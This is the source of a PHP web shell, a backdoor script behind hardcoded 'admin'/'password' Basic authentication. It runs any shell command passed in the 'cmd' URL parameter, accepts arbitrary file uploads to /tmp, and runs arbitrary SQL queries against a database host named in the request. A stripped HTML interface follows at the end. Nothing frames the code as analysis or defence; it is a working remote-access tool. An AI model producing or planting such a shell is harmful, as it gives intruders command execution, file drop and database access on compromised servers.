// Full-Featured PHP Shell
// Check if the user is authenticated
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER'] !== 'admin' || $_SERVER['PHP_AUTH_PW'] !== 'password') {
header('WWW-Authenticate: Basic realm="Restricted Area"');
header('HTTP/1.0 401 Unauthorized');
echo "Access Denied";
exit;
}
// Function to execute shell commands
function execute_command($cmd) {
if (function_exists('shell_exec')) {
return shell_exec($cmd);
} else {
return "Command execution is disabled on this server.";
}
}
// Handle file uploads
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
$upload_dir = '/tmp/';
$upload_file = $upload_dir . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $upload_file)) {
echo "File uploaded successfully: $upload_file";
} else {
echo "File upload failed.";
}
}
// Handle database queries
if (isset($_POST['db_host']) && isset($_POST['db_user']) && isset($_POST['db_pass']) && isset($_POST['db_query'])) {
$db_host = $_POST['db_host'];
$db_user = $_POST['db_user'];
$db_pass = $_POST['db_pass'];
$db_query = $_POST['db_query'];
$conn = new mysqli($db_host, $db_user, $db_pass);
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$result = $conn->query($db_query);
if ($result) {
echo "<pre>";
while ($row = $result->fetch_assoc()) {
print_r($row);
}
echo "</pre>";
} else {
echo "Query failed: " . $conn->error;
}
$conn->close();
}
// Handle command execution
if (isset($_GET['cmd'])) {
$command = $_GET['cmd'];
echo "<pre>" . execute_command($command) . "</pre>";
}
<!DOCTYPE html>
PHP Shell <title>PHP Shell</title>
PHP Shell
File Upload
Database Management